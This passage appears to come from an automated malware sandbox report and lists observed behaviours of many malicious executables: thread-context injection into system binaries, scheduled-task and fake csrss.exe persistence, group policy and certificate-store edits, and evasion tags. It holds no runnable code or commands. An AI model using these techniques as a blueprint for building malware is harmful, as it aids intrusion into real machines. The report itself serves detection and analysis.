File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3620 set thread context of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3964 set thread context of 4552 N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 3232 set thread context of 3840 N/A C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 2616 set thread context of 4688 N/A C:\Users\Admin\AppData\Local\Temp\M52CB.exe C:\Windows\system32\RunDll32.exe
PID 3784 set thread context of 4204 N/A C:\Users\Admin\AppData\Local\Temp\0BB4J.exe C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
PID 4324 set thread context of 5224 N/A C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 5584 set thread context of 5716 N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 3704 set thread context of 3516 N/A C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4116 set thread context of 5624 N/A C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
PID 4960 set thread context of 5984 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1260 set thread context of 5340 N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe C:\Users\Admin\AppData\Local\Temp\4A1B.exe
PID 3880 set thread context of 6076 N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe C:\Users\Admin\AppData\Local\Temp\4A1B.exe
PID 4980 set thread context of 3760 N/A C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
PID 4944 set thread context of 4344 N/A C:\Users\Admin\AppData\Local\Temp\CE07.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4452 set thread context of 3972 N/A C:\Users\Admin\AppData\Local\Temp\3A8A.exe C:\Users\Admin\AppData\Local\Temp\3A8A.exe
PID 4904 set thread context of 109088 N/A C:\Users\Admin\AppData\Local\Temp\F576.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3180 set thread context of 1180 N/A C:\Users\Admin\AppVerif\DllHelper.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 109144 set thread context of 5356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
PID 109296 set thread context of 1164 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\raBkRkUFhLhqVOsAt.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
File created C:\Windows\Tasks\bamNpdvhtkzLwlCraC.job C:\Windows\SysWOW64\schtasks.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\50543188494393494002.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\explorer.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\explorer.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\987E.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\FB35.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Toolbar N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
